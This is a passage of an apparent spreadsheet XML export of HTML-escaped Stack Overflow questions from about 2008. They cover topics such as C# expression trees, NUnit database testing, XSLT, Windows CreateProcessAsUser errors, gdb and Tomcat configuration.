        ParameterExpression target = Expression.Parameter(typeof(U), "target");
        MemberExpression memberAccess = Expression.MakeMemberAccess(target, info);
        //TODO here, make the expression call "typeConverter.FieldToString(fieldValue)"
        LambdaExpression getter = Expression.Lambda(memberAccess, target);
        return (Func&amp;lt;U, string&amp;gt;)getter.Compile();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm looking for what to put in the second TODO area (I can handle the first :)).&lt;/p&gt;
&lt;p&gt;The resulting compiled lambda should take an instance of type U as a param, call the specified member access function, then call the converter's "FieldToString" method with the result, and return the resulting string.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Viewing contents of a .jar file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What would be the easiest way to view classes, methods, properties, etc. inside a jar file?
I'm looking for something equivalent to the very useful &lt;I&gt; Lutz Roeder .NET Reflector &lt;/I&gt; - for Java&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best nntp to web gateway?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company uses usenet groups on an internal nntp server and I would like to add a web server to this that would allow the usual browsing and searching but in addition provide an archive of old messages that may have expired on the server. This is mainly for searching the archives so ability to post is not important.&lt;/p&gt;
&lt;p&gt;Can anyone recommend a piece of software the would act as such a gateway? Most of the stuff I found on Google appears to be either no longer maintained or doesn't offer the archive ability.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regexps in Elisp to include newlines</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to add a special markup to Python documentation strings in emacs (python-mode).&lt;/p&gt;
&lt;p&gt;Currently I'm able to extract a single line with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(font-lock-add-keywords
 'python-mode
 '(("\\(\"\\{3\\}\\.+\"\\{3\\}\\)"
    1 font-lock-doc-face prepend)))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works now:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"""Foo"""
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But as soon there is a newline like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"""
Foo
"""
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It doesn't work anymore. This is logical, since &lt;code&gt;.&lt;/code&gt; doesn't include newlines (&lt;code&gt;\n&lt;/code&gt;).
Should I use a character class?&lt;/p&gt;
&lt;p&gt;How can I correct this regular expression to include everything between &lt;code&gt;""" """&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to automatically create a file with the latest compile time and include it into a library?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a library consisting of approx 100 source files. I want one of the sources to be always rebuilt if any of the other files have been compiled but I don't want it built every time I run the make/build.&lt;/p&gt;
&lt;p&gt;Basically I want this file to have the last build date/time built into it so any application linking to the library can check the last build time/date. Is there any other way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC Beta 1 - Will My Existing User Controls Work In My Views As-Is?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I understand that you can now create MVC-specific user controls, but will my existing standard ASCX user controls work in an MVC view? &lt;/p&gt;
&lt;p&gt;I understand that MVC pages have a completely different lifecycle but will, for example, a Page_Load method be invoked as normal when the control is sitting in a view?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What build tool do you use professionally?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At home, I use CTRL+SHIFT+B or F7 or whatever key sequence initiates the build for my build tool.  At work, this doesn't quite cut it.&lt;/p&gt;
&lt;p&gt;At my first job (an internship) we used a product called Visual Build, which I have come to like very much.  It's the best build tool I've ever worked with.  The down side here is that it's not free.&lt;/p&gt;
&lt;p&gt;At my latest job, I came in knowing literally nothing about Ant.  Now, unfortunately, I've become deeply involved in our build processes, and cannot extricate myself.  It works, yes, but after coming from Visual build, it seems like it's fighting me every step of the way.  Yes, it's free, but we're not trying to be a free-software-only development company or anything.&lt;/p&gt;
&lt;p&gt;I've never looked in to &lt;code&gt;make&lt;/code&gt; or any other build tools, so I don't really know what else is out there.&lt;/p&gt;
&lt;p&gt;Has anybody ever seen or had experience with Visual Build?  Mostly I'm fond of a few key things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;it has a GUI&lt;/li&gt;
&lt;li&gt;it runs arbitrary VBScript without the need of a compiled class&lt;/li&gt;
&lt;li&gt;you can step through the build process, or start from anywhere in the middle.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Are there any free build tools that have this?  Is there any way to convince people that it's worth it to move on?  It's 2008.  We use IDEs to develop, why not (IBEs) to build?&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Edit: &lt;/b&gt; I'm mostly looking for an answer to my last questions; Is there a solution with a built-in GUI that I can use for free?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The ';' character, hexadecimal value 0x3B, cannot be included in a name</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have seen the error "The ';' character, hexadecimal value 0x3B, cannot be included in a name." in my log files for an ASP.NET Web App. The url that's logged looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mypage.aspx?paramone=one+two&amp;amp;amp;paramtwo=zero+1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So my first question is what type of system/browser is encoding the original query string? (This happens rarely)&lt;/p&gt;
&lt;p&gt;I've tried to address this problem with the following snippet of code in the Page_Load() event:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string rawUrl = Request.RawUrl;
if (rawUrl.Contains(amp))
{
    rawUrl = rawUrl.Replace("&amp;amp;amp;", "&amp;amp;");
    Server.Transfer(rawUrl, false);
    return;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However when it transfers back to this page the &lt;code&gt;&amp;amp;amp;&lt;/code&gt; is back in the query string. So I'm guessing that the .Transfer() function encodes the first param.&lt;/p&gt;
&lt;p&gt;Suggestions about solving this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Steps in the memory allocation process for Java objects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;What happens in the memory when a class instantiates the following object?&lt;/strong&gt; &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class SomeObject{
    private String strSomeProperty;
    public SomeObject(String strSomeProperty){
        this.strSomeProperty = strSomeProperty;
    }
    public void setSomeProperty(String strSomeProperty){
        this.strSomeProperty = strSomeProperty;
    }
    public String getSomeProperty(){
        return this.strSomeProperty;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In class &lt;code&gt;SomeClass1&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SomeObject so1 = new SomeObject("some property value");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In class &lt;code&gt;SomeClass2&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SomeObject so2 = new SomeObject("another property value");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;How is memory allocated to the newly instantiated object and its properties?&lt;/strong&gt;  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the advantages of dynamic scoping?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've learned that &lt;a href="http://en.wikipedia.org/wiki/Static_scoping#Static_scoping_.28also_known_as_lexical_scoping.29" rel="nofollow"&gt;static scoping&lt;/a&gt; is the only sane way to do things, and that &lt;a href="http://en.wikipedia.org/wiki/Static_scoping#Dynamic_scoping" rel="nofollow"&gt;dynamic scoping&lt;/a&gt; is the tool of the devil, and results only from poor implementations of interpreters/compilers. &lt;/p&gt;
&lt;p&gt;Then I saw this snippet from a &lt;a href="http://community.schemewiki.org/?scheme-vs-common-lisp" rel="nofollow"&gt;Common Lisp vs. Scheme&lt;/a&gt; article:&lt;/p&gt;
&lt;pre&gt;
Both Lexically and Dynamically    Lexical scope only, per the standard.
scoped special vars.  Common      Dynamically scoped vars are provided
Lisp just wins on this point.     by some implementations as an extension
                                  but code using them is not portable.
     (I have heard the arguments about whether Dynamic scoping
      is or is not a Bad Idea in the first place.  I don't care. 
      I'm just noting that you can do things with it that you 
      can't easily do without it.)
&lt;/pre&gt;
&lt;p&gt;Why does Common Lisp "just win on this point"? What things are easier to do with dynamic scoping? I really can't justify ever needing it / seeing it as a good thing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Putting JVM arguments in a file to be picked up at runtime</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a jar of my current application, which required several JVM arguments to be set.&lt;/p&gt;
&lt;p&gt;Is there a way of setting these JVM arguments in a file rather than on the command line?&lt;/p&gt;
&lt;p&gt;I've done some hunting and it looks like I might be able to do something witha java.properties file, possibly by setting a java-args, but I can't find any reference to the format for doing this.&lt;/p&gt;
&lt;p&gt;Am I barking up the wrong tree?&lt;/p&gt;
&lt;p&gt;Is this possible and if so how?&lt;/p&gt;
&lt;p&gt;If not is there some other way to specify the JVM arguments?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I test database-related code with NUnit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to write unit tests with NUnit that hit the database. I'd like to have the database in a consistent state for each test. I thought transactions would allow me to "undo" each test so I searched around and found several articles from 2004-05 on the topic:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://weblogs.asp.net/rosherove/archive/2004/07/12/180189.aspx"&gt;http://weblogs.asp.net/rosherove/archive/2004/07/12/180189.aspx&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://weblogs.asp.net/rosherove/archive/2004/10/05/238201.aspx"&gt;http://weblogs.asp.net/rosherove/archive/2004/10/05/238201.aspx&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://davidhayden.com/blog/dave/archive/2004/07/12/365.aspx"&gt;http://davidhayden.com/blog/dave/archive/2004/07/12/365.aspx&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://davidhayden.com/blog/dave/archive/2004/07/12/365.aspx"&gt;http://haacked.com/archive/2005/12/28/11377.aspx&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These seem to resolve around implementing a custom attribute for NUnit which builds in the ability to rollback DB operations after each test executes.&lt;/p&gt;
&lt;p&gt;That's great but... &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Does this functionality exists somewhere in NUnit natively?&lt;/li&gt;
&lt;li&gt;Has this technique been improved upon in the last 4 years? &lt;/li&gt;
&lt;li&gt;Is this still the best way to test database-related code?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Edit: it's not that I want to test my DAL specifically, it's more that I want to test pieces of my code that interact with the database. For these tests to be "no-touch" and repeatable, it'd be awesome if I could reset the database after each one.&lt;/p&gt;
&lt;p&gt;Further, I want to ease this into an existing project that has no testing place at the moment. For that reason, I can't practically script up a database and data from scratch for each test.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VS2008 Navigate to class definition add-in</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a Visual Studio add-in that would analyze the text around the cursor position and navigate to the corresponding class definition.&lt;/p&gt;
&lt;p&gt;For example I have this XML file that is currently open:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;object id="abc" type="MyProject.Foo.Bar, MyProject"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I put the cursor somewhere between the double quotes on the &lt;em&gt;type&lt;/em&gt; attribute the add-in should obtain the string &lt;em&gt;"MyProject.Foo.Bar, MyProject"&lt;/em&gt; and search for all projects and project references in the current solution for the given type and if it finds one, it should navigate to the class definition (or metadata if the source code is not available in the current solution).&lt;/p&gt;
&lt;p&gt;If such add-in doesn't exist I would greatly appreciate some pointers that could help me writing one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Drop down list box with dynamic month and year in Date Prompt in Cognos</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to add the current month and the last 2 months for user to select in prompt. 
e.g. if this month is &lt;code&gt;2008 Nov&lt;/code&gt;, then I wil see foowing in &lt;code&gt;ddlbox&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;112008
102008
092008
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;May I know how to do it? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recommendations for column-oriented database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've found databases typically come in two flavors, your traditional row-oriented RDBMS or an object oriented database (OODBMS).  However, in the mid 90s I remember, a new breed of databases showing up that were column oriented.  Some of these were given the term 4GL, but I don't think it was a term that stuck.&lt;/p&gt;
&lt;p&gt;What I'd like to know is the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What column oriented databases still exist?&lt;/li&gt;
&lt;li&gt;What are the performance characteristics of these databases?&lt;/li&gt;
&lt;li&gt;Are there any open source column oriented databases?&lt;/li&gt;
&lt;li&gt;What platforms do they interoperate with (.NET, Java, etc)&lt;/li&gt;
&lt;li&gt;What's been your general experience with them?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The two column oriented databases that I remember working with are FAME and KDB.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I convert a hex string to a byte array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/311165/how-do-you-convert-byte-array-to-hexadecimal-string-and-vice-versa-in-c"&gt;How do you convert Byte Array to Hexadecimal String, and vice versa, in C#?&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Can we convert a hex string to a byte array using a built-in function in C# or do I have to make a custom method for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unit Testing: Creating a 'mock' request to simulate a MVC page request</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I go about creating a mock request for my asp.net-mvc application for unit-testing?&lt;/p&gt;
&lt;p&gt;What options do I have?&lt;/p&gt;
&lt;p&gt;I am using FormsCollection in my Actions so I can simulate form input data also.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set a field value in an C# Expression tree?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FieldInfo field = &amp;lt;some valid string field on type T&amp;gt;;
ParameterExpression targetExp = Expression.Parameter(typeof(T), "target");
ParameterExpression valueExp = Expression.Parameter(typeof(string), "value");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I compile a lambda expression to set the field on the "target" parameter to "value"?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Building a database driven menu with ASP.NET, JQuery and Suckerfish</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm attempting at creating a menu from a table using the Suckerfish css menu and Jquery. I'm using this as my reference: &lt;a href="http://www.aspcode.net/Suckerfish-menu-with-ASPNET-and-JQuery.aspx" rel="nofollow"&gt;Suckerfish menu with ASP.NET and JQuery&lt;/a&gt; and I have it working with manually supplied links (much like in the article).&lt;/p&gt;
&lt;p&gt;Where I'm having issues is writing the recursive function to get the menu items from the database and create the new menu items in the proper hierarchy. My database table looks like so:&lt;/p&gt;
&lt;p&gt;Table Menu
&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;MenuID
ParentID
Link
Text&lt;/p&gt;
&lt;p&gt;The idea being that if an item is a parent-level item the MenuID and ParentID are the same, if it's a child it will have the MenuID of it's parent in the ParentID field. I'm needing to create a function that can go through and find all of the children for the parents (could be a few levels) and have it replace manual entries like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        Dim Foo As New MenuItem("#", "Foo", Me)
        Items.Add(Foo)
        Foo.Items.Add(New MenuItem("#", "1", Me))
        Foo.Items.Add(New MenuItem("#", "2", Me))
        Foo.Items.Add(New MenuItem("#", "3", Me))
        Foo.Items.Add(New MenuItem("#", "4", Me))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm open to changing the database table structure if necessary and basically doing anything else to get this going.&lt;/p&gt;
&lt;p&gt;Thanks for any input, it's much appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practices for version control comments</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is a lot of conversation about commenting code, but how about commenting on check-ins?&lt;/p&gt;
&lt;p&gt;I found this blog post:
&lt;a href="http://redbitbluebit.com/subversion-check-in-comment-great-practices/" rel="nofollow"&gt;http://redbitbluebit.com/subversion-check-in-comment-great-practices/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As the guy who is putting together the release notes, I am looking for ways to make that job easier.&lt;/p&gt;
&lt;p&gt;Currently we defined our own scheme with &lt;code&gt;&amp;lt;Begin_Doc&amp;gt;...&amp;lt;End_Doc&amp;gt;&lt;/code&gt; for anything that should be published to our software customers.  But even for the internal stuff, I'd like to know the "why" for every change.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to remove elements from xml using xslt with stylesheet and xsltproc?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a lot of XML files which have something of the form:&lt;/p&gt;
&lt;pre&gt;
&amp;lt Element  
    fruit="apple"  
    animal="cat" 
/&amp;gt
&lt;/pre&gt;
&lt;p&gt;Which I want to be removed from the file.&lt;/p&gt;
&lt;p&gt;Using an XSLT stylesheet and the Linux command-line utility xsltproc, how could I do this?&lt;/p&gt;
&lt;p&gt;By this point in the script I already have the list of files containing the element I wish to remove, so the single file can be used as a parameter.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; the question was originally lacking in intention.&lt;/p&gt;
&lt;p&gt;What I am trying to achieve is to remove the entire element "Element" where (fruit=="apple" &amp;amp;&amp;amp; animal=="cat"). In the same document there are many elements named "Element", I wish for these to remain. So&lt;/p&gt;
&lt;pre&gt;
&amp;lt Element  
    fruit="orange"  
    animal="dog" 
/&amp;gt
&amp;lt Element  
    fruit="apple"  
    animal="cat" 
/&amp;gt  
&amp;lt Element  
    fruit="pear"  
    animal="wild three eyed mongoose of kentucky" 
/&amp;gt
&lt;/pre&gt;
&lt;p&gt;Would become:&lt;/p&gt;
&lt;pre&gt;
&amp;lt Element  
    fruit="orange"  
    animal="dog" 
/&amp;gt
&amp;lt Element  
    fruit="pear"  
    animal="wild three eyed mongoose of kentucky" 
/&amp;gt
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>CreateProcessAsUser not working correctly in my experiments</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to do the following:
1. I am logged in as Administrator account in my XP with SP2 machine running VS.NET 2005
2. This machine also has another account user1 which is a guest account
3. I am running a program as Administrator, from this program i want to launch a notepad.exe process which will be running under the user1 security context
4. I specifically want to use CreateProcessasUser to do this..&lt;/p&gt;
&lt;p&gt;This is the code snipper which will explain what i have been trying..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const string GRANTED_ALL = "10000000";
const int LOGON32_LOGON_INTERACTIVE = 2;
const int LOGON32_LOGON_NETWORK = 3;
const int LOGON32_LOGON_BATCH = 4;
const int LOGON32_LOGON_SERVICE = 5;
const int LOGON32_LOGON_UNLOCK = 7;
const int LOGON32_LOGON_NETWORK_CLEARTEXT = 8;
const int LOGON32_LOGON_NEW_CREDENTIALS = 9;
const int LOGON32_PROVIDER_DEFAULT = 0;
static IntPtr hToken = IntPtr.Zero;
static IntPtr hTokenDuplicate = IntPtr.Zero;
static void Main(string[] args)
{
    int last_error = 0;
    if(LogonUser("user1",null,"#welcome123",
        LOGON32_LOGON_INTERACTIVE, 
        LOGON32_PROVIDER_DEFAULT, out hToken))
    {
        last_error = Marshal.GetLastWin32Error();
        PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
        STARTUPINFO si = new STARTUPINFO();
        SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
        last_error = 0;
        last_error = Marshal.GetLastWin32Error();
        if(DuplicateTokenEx(hToken,UInt32.Parse(GRANTED_ALL,System.Globalization.NumberStyles.HexNumber),
            ref sa,SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
            TOKEN_TYPE.TokenPrimary,out hTokenDuplicate))
        {
            last_error = 0;
            last_error = Marshal.GetLastWin32Error();
            CreateProcessAsUser(hTokenDuplicate, "d:\\san\\notepad.exe", null,
            ref sa, ref sa, false, 0, IntPtr.Zero, "d:\\san", ref si, out pi);
            last_error = 0;
            last_error = Marshal.GetLastWin32Error();
        }
    }
    last_error = 0;
    last_error = Marshal.GetLastWin32Error();
    if (hToken != IntPtr.Zero) CloseHandle(hToken);
    if (hTokenDuplicate != IntPtr.Zero) CloseHandle(hTokenDuplicate);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;p&gt;For some reason this is not working..
The DuplicateTokenEx function is returning as error code of 1305 and i cant seem to figure out why..&lt;/p&gt;
&lt;p&gt;Instead of DuplicateTokenEx i also used the DuplicateToken, now the CreateProcessAsUser is returning an error code of 1308.&lt;/p&gt;
&lt;p&gt;Could someone please throw light on this issue.. This appears to be an apparently very simple thing, but just cant get it right..
[Please note that I specifically want to LogonUser and then DuplicateToken and then CreateProcessAsUSer]&lt;/p&gt;
&lt;p&gt;Thanks
Santhosh&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Powershell remoting with V1</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you know of any good remoting solutions using powershell V1 (I know the V2 stuff is awesome, but my organization doesn't like using pre-release software).  I don't need anything spectactular, just a way to kick off powershell script on another box and get the results back when they're done.  I'm considering using sysinternals PSEXEC and export-csv/import-csv and just making something that works.  I'd rather have someone else do the work, though.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Java work with PCF fonts?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to make IBM jre to use PCF fonts from default X11 installation on my linux box. In particular adobe-helvetica font. I have toyed to modify fontconfig.properties in jre/lib folder but no matter what I do Java seams to use some other fonts. I guess there is some algorithm how java VM tries to link java logical fonts to actual physical fonts in the system even in case when font specified in config could not be used. On Windows it is pretty straight forward, but on Linux I was unable to make it work with anything except TrueType fonts.&lt;br&gt;
Anybody have experience with configuring fonts on IBM jre on Linux?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing a list of avaliable Wifi APs, on Windows Mobile</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to query for a list of available Wireless Access points. I only need their SSIDs.&lt;/p&gt;
&lt;p&gt;The App is currently .Net CF 2.0, but it's not a problem going with 3.5 if we have to.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Perl module that validates an XML against a schema?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to validate an XML agaist a schema.  &lt;/p&gt;
&lt;p&gt;I tried XML::SAX::ParserFactory; XML::Validator::Schema and related modules but looks like they are limited.&lt;br /&gt;
Limited in the sense that it didn't recognize schema elements such as xsd:unique, xsd:group, xsd:keyref, xsd:union and xsd:key.  &lt;/p&gt;
&lt;p&gt;Are these xsd:unique, etc. new additions?&lt;/p&gt;
&lt;p&gt;Appreciate if you can point me to some Perl modules which are upto date and upto the task.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Invoke gdb to automatically pass arguments to the program being debugged</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to write a script that (under certain conditions) will execute gdb and automatically run some program X with some set of arguments Y.  Once the program has finished executing the user should remain at gdb's prompt until s/he explicitly exits it.&lt;/p&gt;
&lt;p&gt;One way to do this would be to have the script output the run command plus arguments Y to some file F and then have the script invoke gdb like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;gdb X &amp;lt; F
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But is there a way to do this without introducing a temporary file?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET 3.5 bind to XML string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With ASP.NET 3.5 I can easily bind to an XML file by using an &lt;code&gt;XmlDataSource&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;How can I bind to an XML &lt;em&gt;string&lt;/em&gt; instead of a &lt;em&gt;file&lt;/em&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which Tomcat 5 context file takes precedence?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://tomcat.apache.org/tomcat-5.5-doc/deployer-howto.html" rel="nofollow"&gt;Tomcat documentation&lt;/a&gt; says: &lt;/p&gt;
&lt;p&gt;The locations for Context Descriptors are;&lt;/p&gt;
&lt;p&gt;$CATALINA_HOME/conf/[enginename]/[hostname]/context.xml&lt;br&gt;
$CATALINA_HOME/webapps/[webappname]/META-INF/context.xml&lt;/p&gt;
&lt;p&gt;On my server, I have at least 3 files floating around:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1 ...tomcat/conf/context.xml
2 ...tomcat/Catalina/localhost/myapp.xml
3 ...tomcat/webapps/myapp/META-INF/context.xml
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the order of precedence? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting the Web Capture Web Part to work were the Sharepoint is 64bit</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Previously our SharePoint server was 32-bit and we used the web capture web part to display a bugzilla search results page. Since we've migrated to a 64-bit server the webpart no longer works. We're running the same versions of everything, the only change was moving from a Windows Server 2003 32-bit box to a Windows Server 2003 64-bit box.&lt;/p&gt;
&lt;p&gt;Oddly enough, the logs don't contain anything. The pages where the webparts appear are the only place that error messages appear. Here is what I have:&lt;/p&gt;
&lt;p&gt;-Web Part Error: A Web Part or Web Form Control on this Page cannot be displayed or imported. The type could not be found or it is not registered as safe.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Error - An unexpected error has been encountered in this Web Part.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The reason I suspect the 64bit vs 32bit issue is that I saw numerous posts on the subject in various forums. It would appear that I am not the only one with this issue and all the troubleshooting has lead to this conclusion.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I examine the contents of an std::vector in gdb, using the icc compiler?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to examine the contents of a std::vector in gdb but I don't have access to _M_impl because I'm using icc, not gcc, how do I do it? Let's say it's a std::vector for the sake of simplicity.&lt;/p&gt;
&lt;p&gt;There is a very nice answer &lt;a href="http://stackoverflow.com/questions/253099/how-do-i-print-the-elements-of-a-c-vector-in-gdb"&gt;here&lt;/a&gt; but this doesn't work if I use icc, the error message is "There is no member or method named _M_impl". There appears to be a nice debug toolset &lt;a href="http://www.yolinux.com/TUTORIALS/GDB-Commands.html#STLDEREF"&gt;here&lt;/a&gt; but it also relies on _M_impl.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>API to determine cell carrier?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a free API or some other way to determine what carrier a cell phone number is registered with?&lt;/p&gt;
&lt;p&gt;I'd like my application to broadcast text messages without them picking their carrier from a list.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;
Interestingly, a coworker found the answer: &lt;a href="http://developer.whitepages.com/" rel="nofollow"&gt;http://developer.whitepages.com/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE2:&lt;/strong&gt; 
Well the whitepages license agreement is so restrictive that you can't build an app for it.  Any other ideas?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE3:&lt;/strong&gt;&lt;br&gt;
At some point, someone removed my Update 2.  This puts it back.  More importantly as of 10/19/2015 the &lt;a href="http://pro.whitepages.com/terms-of-service/?_ga=1.260850253.1904530943.1445280336" rel="nofollow"&gt;Terms of Service&lt;/a&gt; is still in a state that it should be impossible to legally utilize their services.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I invoke an instance method on a Ruby module without including it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;Background:&lt;/h3&gt;
&lt;p&gt;I have a module which declares a number of instance methods&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;module UsefulThings
  def get_file; ...
  def delete_file; ...
  def format_text(x); ...
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I want to call some of these methods from within a class. How you normally do this in ruby is like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class UsefulWorker
  include UsefulThings
  def do_work
    format_text("abc")
    ...
  end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Problem&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;include UsefulThings&lt;/code&gt; brings in &lt;em&gt;all&lt;/em&gt; of the methods from &lt;code&gt;UsefulThings&lt;/code&gt;. In this case I only want &lt;code&gt;format_text&lt;/code&gt; and explicitly do not want &lt;code&gt;get_file&lt;/code&gt; and &lt;code&gt;delete_file&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I can see several possible solutions to this: &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Somehow invoke the method directly on the module without including it anywhere
&lt;ul&gt;
